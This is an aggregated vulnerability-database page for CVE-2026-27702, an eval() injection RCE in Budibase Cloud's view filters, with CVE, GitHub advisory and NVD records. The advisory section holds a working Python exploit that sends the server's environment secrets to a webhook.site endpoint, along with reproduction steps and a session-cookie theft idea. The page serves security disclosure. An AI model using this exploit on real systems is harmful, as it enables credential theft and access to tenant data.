Vulnerability-Lookup

CVE-2026-27702 (GCVE-0-2026-27702)

Vulnerability from cvelistv5 – Published: 2026-02-25 15:11 – Updated: 2026-02-25 20:43

Title

Budibase Vulnerable to Remote Code Execution via Unsafe eval() in View Filter Map Function (Budibase Cloud)

Summary

Budibase is a low code platform for creating internal tools, workflows, and admin panels. Prior to version 3.30.4, an unsafe `eval()` vulnerability in Budibase's view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization. The primary impact comes from what lives inside the pod's environment: the `app-service` pod runs with secrets baked into its environment variables, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable. Version 3.30.4 contains a patch.

Severity ?

9.9 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

CWE

CWE-20 - Improper Input Validation
CWE-94 - Improper Control of Generation of Code ('Code Injection')
CWE-95 - Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/Budibase/budibase/security/adv…	x_refsource_CONFIRM
	https://github.com/Budibase/budibase/pull/18087	x_refsource_MISC
	https://github.com/Budibase/budibase/commit/34865…	x_refsource_MISC
	https://github.com/Budibase/budibase/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	Budibase	budibase	Affected: < 3.30.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27702",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-25T20:43:20.935389Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-25T20:43:35.833Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "budibase",
          "vendor": "Budibase",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.30.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Budibase is a low code platform for creating internal tools, workflows, and admin panels. Prior to version 3.30.4, an unsafe `eval()` vulnerability in Budibase\u0027s view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization. The primary impact comes from what lives inside the pod\u0027s environment: the `app-service` pod runs with secrets baked into its environment variables, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable. Version 3.30.4 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-95",
              "description": "CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (\u0027Eval Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-25T15:11:16.324Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8"
        },
        {
          "name": "https://github.com/Budibase/budibase/pull/18087",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Budibase/budibase/pull/18087"
        },
        {
          "name": "https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d"
        },
        {
          "name": "https://github.com/Budibase/budibase/releases/tag/3.30.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Budibase/budibase/releases/tag/3.30.4"
        }
      ],
      "source": {
        "advisory": "GHSA-rvhr-26g4-p2r8",
        "discovery": "UNKNOWN"
      },
      "title": "Budibase Vulnerable to Remote Code Execution via Unsafe eval() in View Filter Map Function (Budibase Cloud)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27702",
    "datePublished": "2026-02-25T15:11:16.324Z",
    "dateReserved": "2026-02-23T17:56:51.202Z",
    "dateUpdated": "2026-02-25T20:43:35.833Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-27702",
      "date": "2026-04-21",
      "epss": "0.00085",
      "percentile": "0.24531"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27702\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T16:23:26.777\",\"lastModified\":\"2026-03-02T19:31:39.263\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Budibase is a low code platform for creating internal tools, workflows, and admin panels. Prior to version 3.30.4, an unsafe `eval()` vulnerability in Budibase\u0027s view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization. The primary impact comes from what lives inside the pod\u0027s environment: the `app-service` pod runs with secrets baked into its environment variables, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable. Version 3.30.4 contains a patch.\"},{\"lang\":\"es\",\"value\":\"Budibase es una plataforma de bajo c\u00f3digo para crear herramientas internas, flujos de trabajo y paneles de administraci\u00f3n. Antes de la versi\u00f3n 3.30.4, una `vulnerabilidad` `eval()` insegura en la implementaci\u00f3n de filtrado de vistas de Budibase permite a cualquier usuario autenticado (incluidas las cuentas de nivel gratuito) ejecutar c\u00f3digo JavaScript arbitrario en el `servidor`. Esta `vulnerabilidad` SOLO afecta a Budibase Cloud (SaaS) - las implementaciones autoalojadas usan vistas nativas de CouchDB y no son `vulnerables`. La `vulnerabilidad` existe en `packages/server/src/db/inMemoryView.ts` donde las funciones de mapeo de vistas controladas por el usuario se eval\u00faan directamente sin sanitizaci\u00f3n. El `impacto` principal proviene de lo que reside dentro del entorno del pod: el pod `app-service` se ejecuta con secretos incorporados en sus variables de entorno, incluyendo `INTERNAL_API_KEY`, `JWT_SECRET`, credenciales de administrador de CouchDB, claves de AWS y m\u00e1s. Usando las credenciales de CouchDB extra\u00eddas, verificamos el acceso directo a la `base de datos`, enumeramos todas las `bases de datos` de inquilinos, y confirmamos que los registros de usuario (direcciones de correo electr\u00f3nico) son legibles. La versi\u00f3n 3.30.4 contiene un `parche`.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-94\"},{\"lang\":\"en\",\"value\":\"CWE-95\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.30.4\",\"matchCriteriaId\":\"6366022F-080A-40DB-B1E9-CD5811BED55D\"}]}]}],\"references\":[{\"url\":\"https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Budibase/budibase/pull/18087\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/Budibase/budibase/releases/tag/3.30.4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

GHSA-RVHR-26G4-P2R8

Vulnerability from github – Published: 2026-02-25 18:57 – Updated: 2026-02-25 18:57

Summary

Budibase: Remote Code Execution via Unsafe eval() in View Filter Map Function (Budibase Cloud)

Details

Summary

A critical unsafe eval() vulnerability in Budibase's view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in packages/server/src/db/inMemoryView.ts where user-controlled view map functions are directly evaluated without sanitization.

The primary impact comes from what lives inside the pod's environment: the app-service pod runs with secrets baked into its environment variables, including INTERNAL_API_KEY, JWT_SECRET, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable.

Details

Root Cause

File: packages/server/src/db/inMemoryView.ts:28

export async function runView(
  view: DBView,
  calculation: string,
  group: boolean,
  data: Row[]
) {
  // ...
  let fn = (doc: Document, emit: any) => emit(doc._id)
  // BUDI-7060 -> indirect eval call appears to cause issues in cloud
  eval("fn = " + view?.map?.replace("function (doc)", "function (doc, emit)"))  // UNSAFE EVAL
  // ...
}

Why Only Cloud is Vulnerable:

File: packages/server/src/sdk/workspace/rows/search/internal/internal.ts:194-221

if (env.SELF_HOSTED) {
  // Self-hosted: Uses native CouchDB design documents - NO EVAL
  response = await db.query(`database/${viewName}`, {
    include_docs: !calculation,
    group: !!group,
  })
} else {
  // Cloud: Uses in-memory PouchDB with UNSAFE EVAL
  const tableId = viewInfo.meta!.tableId
  const data = await fetchRaw(tableId!)
  response = await inMemoryViews.runView(  // <- Calls vulnerable function
    viewInfo,
    calculation as string,
    !!group,
    data
  )
}

The view.map parameter comes directly from user input when creating table views with filters. The code constructs a string by concatenating "fn = " with the user-controlled map function and passes it to eval(), allowing arbitrary JavaScript execution in the Node.js server context.

Self-hosted deployments are not affected because they use native CouchDB design documents instead of the in-memory eval() path.

Attack Flow

Authenticated user creates a table view with custom filter
Frontend sends POST request to /api/views with malicious payload in filter value
Backend stores view configuration in CouchDB
When view is queried (GET /api/views/{viewName}), runView() is called
Malicious code is eval()'d on server - RCE achieved

Exploitation Vector

The vulnerability is triggered via the view filter mechanism. When creating a view with a filter condition, the filter value can be injected with JavaScript code that breaks out of the intended expression context:

Malicious filter value:

x" || (MALICIOUS_CODE_HERE, true) || "

This payload: - Closes the expected string context with x" - Uses || (OR operator) to inject arbitrary code - Returns true to make the filter always match - Closes with || "" to maintain valid syntax

Verified on Production

Tested on own Budibase Cloud account (y4ylfy7m.budibase.app,) to confirm severity. Testing was deliberately limited - no customer data was retained and exploitation was stopped once impact was confirmed: - Achieved RCE on app-service pod (hostname: app-service-5f4f6d796d-p6dhz, Kubernetes, eu-west-1) - Extracted process.env - confirmed presence of platform secrets (JWT_SECRET, INTERNAL_API_KEY, COUCH_DB_URL, MINIO_ACCESS_KEY, etc.) - Used extracted COUCH_DB_URL credentials to verify CouchDB access - enumerated database list (489,827 databases) to confirm scale of impact - Queried users table to confirm data is readable (retrieved email addresses) - Uploaded an HTML file as a PoC artifact to confirm write access.

Proof of Concept

PoC Script

import requests, time
from urllib.parse import urlparse

# Config | CHANGE THESE
URL = "https://[YOUR-TENANT].budibase.app"
WEBHOOK = "https://webhook.site/[YOUR-WEBHOOK-ID]"
JWT = "[YOUR-JWT-TOKEN]"          # budibase:auth cookie value
APP_ID = "app_dev_[TENANT]_[APP-UUID]"  # x-budibase-app-id header
TABLE_ID = "[YOUR-TABLE-ID]"      # any table ID (e.g. ta_users)

# Payload - parses hostname/path from WEBHOOK automatically
webhook_parsed = urlparse(WEBHOOK)
view = f"RCE_{int(time.time())}"
payload = f'''x" || (require('https').request({{hostname:'{webhook_parsed.hostname}',path:'{webhook_parsed.path}',method:'POST'}}).end(JSON.stringify(process.env)), true) || "'''

# Exploit
s = requests.Session()
s.cookies.set('budibase:auth', JWT)
s.headers.update({"x-budibase-app-id": APP_ID, "Content-Type": "application/json"})

print(f"[*] Creating view...")
s.post(f"{URL}/api/views", json={"tableId": TABLE_ID, "name": view, "filters": [{"key": "email", "condition": "EQUALS", "value": payload}]})

print(f"[*] Triggering RCE...")
s.get(f"{URL}/api/views/{view}")

print(f"[+] Done! Check: {WEBHOOK}")

Video Demo

https://github.com/user-attachments/assets/cd12e1ab-02fd-4d0d-9fb5-d78bb83cdf99

Reproduction Steps

Prerequisites:
Create free Budibase Cloud account at https://budibase.app
Create a new app
Create a table with at least one text field
Exploitation:
Copy the PoC script above
Replace placeholders with your tenant URL, app ID, table ID
Get your JWT token from browser cookies (budibase:auth)
Create a webhook at https://webhook.site for exfiltration
Run the script: python3 budibase_rce_poc.py
Verification:
Check webhook.site - you'll receive all server environment variables
Extracted data includes JWT_SECRET, INTERNAL_API_KEY, database credentials

Additional Note

The budibase:auth session cookie has Domain=.budibase.app (leading dot = all subdomains) and no HttpOnly flag, making it readable by JavaScript. Since the RCE allows uploading arbitrary HTML files to any subdomain (as demonstrated with the PoC artifact), an attacker could serve an XSS payload from their own tenant subdomain and steal session cookies from any Budibase Cloud user who visits that page (one click ATO).

Responsible Disclosure Statement

This vulnerability was discovered during independent security research. Testing was conducted on a personal free-tier account only. Exploitation was deliberately limited to what was necessary to confirm the vulnerability and its impact:

No customer data was accessed beyond enumerating database names and confirming that user records (email addresses) are readable
The PoC HTML file uploaded to confirm write access is benign
This report is being submitted directly to Budibase security with no plans for public disclosure until a fix is in place
Before any public disclosure, this report must be redacted/simplified - all credentials, hostnames, internal API keys, tenant IDs, and other sensitive platform details included here for Budibase's remediation purposes must be removed or redacted

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "budibase"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.30.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27702"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:57:39Z",
    "nvd_published_at": "2026-02-25T16:23:26Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nA critical unsafe `eval()` vulnerability in Budibase\u0027s view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. **This vulnerability ONLY affects Budibase Cloud (SaaS)** - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization.\n\nThe primary impact comes from what lives inside the pod\u0027s environment: the `app-service` pod runs with **secrets baked into its environment variables**, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable.\n\n## Details\n\n### Root Cause\n\nFile: `packages/server/src/db/inMemoryView.ts:28`\n\n```javascript\nexport async function runView(\n  view: DBView,\n  calculation: string,\n  group: boolean,\n  data: Row[]\n) {\n  // ...\n  let fn = (doc: Document, emit: any) =\u003e emit(doc._id)\n  // BUDI-7060 -\u003e indirect eval call appears to cause issues in cloud\n  eval(\"fn = \" + view?.map?.replace(\"function (doc)\", \"function (doc, emit)\"))  // UNSAFE EVAL\n  // ...\n}\n```\n\n**Why Only Cloud is Vulnerable:**\n\nFile: `packages/server/src/sdk/workspace/rows/search/internal/internal.ts:194-221`\n\n```typescript\nif (env.SELF_HOSTED) {\n  // Self-hosted: Uses native CouchDB design documents - NO EVAL\n  response = await db.query(`database/${viewName}`, {\n    include_docs: !calculation,\n    group: !!group,\n  })\n} else {\n  // Cloud: Uses in-memory PouchDB with UNSAFE EVAL\n  const tableId = viewInfo.meta!.tableId\n  const data = await fetchRaw(tableId!)\n  response = await inMemoryViews.runView(  // \u003c- Calls vulnerable function\n    viewInfo,\n    calculation as string,\n    !!group,\n    data\n  )\n}\n```\n\nThe `view.map` parameter comes directly from user input when creating table views with filters. The code constructs a string by concatenating `\"fn = \"` with the user-controlled map function and passes it to `eval()`, allowing arbitrary JavaScript execution in the Node.js server context.\n\n**Self-hosted deployments are not affected** because they use native CouchDB design documents instead of the in-memory eval() path.\n\n### Attack Flow\n\n1. Authenticated user creates a table view with custom filter\n2. Frontend sends POST request to `/api/views` with malicious payload in filter value\n3. Backend stores view configuration in CouchDB\n4. When view is queried (GET `/api/views/{viewName}`), `runView()` is called\n5. Malicious code is `eval()`\u0027d on server - RCE achieved\n\n### Exploitation Vector\n\nThe vulnerability is triggered via the view filter mechanism. When creating a view with a filter condition, the filter value can be injected with JavaScript code that breaks out of the intended expression context:\n\n**Malicious filter value:**\n```javascript\nx\" || (MALICIOUS_CODE_HERE, true) || \"\n```\n\nThis payload:\n- Closes the expected string context with `x\"`\n- Uses `||` (OR operator) to inject arbitrary code\n- Returns `true` to make the filter always match\n- Closes with `|| \"\"` to maintain valid syntax\n\n### Verified on Production\n\nTested on own Budibase Cloud account (y4ylfy7m.budibase.app,) to confirm severity. Testing was deliberately limited - no customer data was retained and exploitation was stopped once impact was confirmed:\n- Achieved RCE on `app-service` pod (hostname: `app-service-5f4f6d796d-p6dhz`, Kubernetes, `eu-west-1`)\n- Extracted `process.env` - confirmed presence of platform secrets (`JWT_SECRET`, `INTERNAL_API_KEY`, `COUCH_DB_URL`, `MINIO_ACCESS_KEY`, etc.)\n- Used extracted `COUCH_DB_URL` credentials to verify CouchDB access - enumerated database list (489,827 databases) to confirm scale of impact\n- Queried users table to confirm data is readable (retrieved email addresses)\n- Uploaded an HTML file as a PoC artifact to confirm write access.\n\n\n\n\n\n## Proof of Concept\n\n### PoC Script\n\n```python\nimport requests, time\nfrom urllib.parse import urlparse\n\n# Config | CHANGE THESE\nURL = \"https://[YOUR-TENANT].budibase.app\"\nWEBHOOK = \"https://webhook.site/[YOUR-WEBHOOK-ID]\"\nJWT = \"[YOUR-JWT-TOKEN]\"          # budibase:auth cookie value\nAPP_ID = \"app_dev_[TENANT]_[APP-UUID]\"  # x-budibase-app-id header\nTABLE_ID = \"[YOUR-TABLE-ID]\"      # any table ID (e.g. ta_users)\n\n# Payload - parses hostname/path from WEBHOOK automatically\nwebhook_parsed = urlparse(WEBHOOK)\nview = f\"RCE_{int(time.time())}\"\npayload = f\u0027\u0027\u0027x\" || (require(\u0027https\u0027).request({{hostname:\u0027{webhook_parsed.hostname}\u0027,path:\u0027{webhook_parsed.path}\u0027,method:\u0027POST\u0027}}).end(JSON.stringify(process.env)), true) || \"\u0027\u0027\u0027\n\n# Exploit\ns = requests.Session()\ns.cookies.set(\u0027budibase:auth\u0027, JWT)\ns.headers.update({\"x-budibase-app-id\": APP_ID, \"Content-Type\": \"application/json\"})\n\nprint(f\"[*] Creating view...\")\ns.post(f\"{URL}/api/views\", json={\"tableId\": TABLE_ID, \"name\": view, \"filters\": [{\"key\": \"email\", \"condition\": \"EQUALS\", \"value\": payload}]})\n\nprint(f\"[*] Triggering RCE...\")\ns.get(f\"{URL}/api/views/{view}\")\n\nprint(f\"[+] Done! Check: {WEBHOOK}\")\n```\n\n### Video Demo\nhttps://github.com/user-attachments/assets/cd12e1ab-02fd-4d0d-9fb5-d78bb83cdf99\n\n\n### Reproduction Steps\n\n1. **Prerequisites:**\n   - Create free Budibase Cloud account at https://budibase.app\n   - Create a new app\n   - Create a table with at least one text field\n\n2. **Exploitation:**\n   - Copy the PoC script above\n   - Replace placeholders with your tenant URL, app ID, table ID\n   - Get your JWT token from browser cookies (`budibase:auth`)\n   - Create a webhook at https://webhook.site for exfiltration\n   - Run the script: `python3 budibase_rce_poc.py`\n\n3. **Verification:**\n   - Check webhook.site - you\u0027ll receive all server environment variables\n   - Extracted data includes JWT_SECRET, INTERNAL_API_KEY, database credentials\n\n## Additional Note\n\nThe `budibase:auth` session cookie has `Domain=.budibase.app` (leading dot = all subdomains) and no `HttpOnly` flag, making it readable by JavaScript. Since the RCE allows uploading arbitrary HTML files to any subdomain (as demonstrated with the PoC artifact), an attacker could serve an XSS payload from their own tenant subdomain and steal session cookies from any Budibase Cloud user who visits that page (one click ATO).\n\n## Responsible Disclosure Statement\n\nThis vulnerability was discovered during independent security research. Testing was conducted on a personal free-tier account only. Exploitation was deliberately limited to what was necessary to confirm the vulnerability and its impact:\n\n- No customer data was accessed beyond enumerating database names and confirming that user records (email addresses) are readable\n- The PoC HTML file uploaded to confirm write access is benign\n- This report is being submitted directly to Budibase security with no plans for public disclosure until a fix is in place\n- **Before any public disclosure, this report must be redacted/simplified** - all credentials, hostnames, internal API keys, tenant IDs, and other sensitive platform details included here for Budibase\u0027s remediation purposes must be removed or redacted",
  "id": "GHSA-rvhr-26g4-p2r8",
  "modified": "2026-02-25T18:57:39Z",
  "published": "2026-02-25T18:57:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27702"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/pull/18087"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/3.30.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase: Remote Code Execution via Unsafe eval() in View Filter Map Function (Budibase Cloud)"
}

FKIE_CVE-2026-27702

Vulnerability from fkie_nvd - Published: 2026-02-25 16:23 - Updated: 2026-03-02 19:31

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
9.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d	Patch
security-advisories@github.com	https://github.com/Budibase/budibase/pull/18087	Issue Tracking
security-advisories@github.com	https://github.com/Budibase/budibase/releases/tag/3.30.4	Release Notes
security-advisories@github.com	https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	budibase	budibase	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6366022F-080A-40DB-B1E9-CD5811BED55D",
              "versionEndExcluding": "3.30.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Budibase is a low code platform for creating internal tools, workflows, and admin panels. Prior to version 3.30.4, an unsafe `eval()` vulnerability in Budibase\u0027s view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization. The primary impact comes from what lives inside the pod\u0027s environment: the `app-service` pod runs with secrets baked into its environment variables, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable. Version 3.30.4 contains a patch."
    },
    {
      "lang": "es",
      "value": "Budibase es una plataforma de bajo c\u00f3digo para crear herramientas internas, flujos de trabajo y paneles de administraci\u00f3n. Antes de la versi\u00f3n 3.30.4, una `vulnerabilidad` `eval()` insegura en la implementaci\u00f3n de filtrado de vistas de Budibase permite a cualquier usuario autenticado (incluidas las cuentas de nivel gratuito) ejecutar c\u00f3digo JavaScript arbitrario en el `servidor`. Esta `vulnerabilidad` SOLO afecta a Budibase Cloud (SaaS) - las implementaciones autoalojadas usan vistas nativas de CouchDB y no son `vulnerables`. La `vulnerabilidad` existe en `packages/server/src/db/inMemoryView.ts` donde las funciones de mapeo de vistas controladas por el usuario se eval\u00faan directamente sin sanitizaci\u00f3n. El `impacto` principal proviene de lo que reside dentro del entorno del pod: el pod `app-service` se ejecuta con secretos incorporados en sus variables de entorno, incluyendo `INTERNAL_API_KEY`, `JWT_SECRET`, credenciales de administrador de CouchDB, claves de AWS y m\u00e1s. Usando las credenciales de CouchDB extra\u00eddas, verificamos el acceso directo a la `base de datos`, enumeramos todas las `bases de datos` de inquilinos, y confirmamos que los registros de usuario (direcciones de correo electr\u00f3nico) son legibles. La versi\u00f3n 3.30.4 contiene un `parche`."
    }
  ],
  "id": "CVE-2026-27702",
  "lastModified": "2026-03-02T19:31:39.263",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
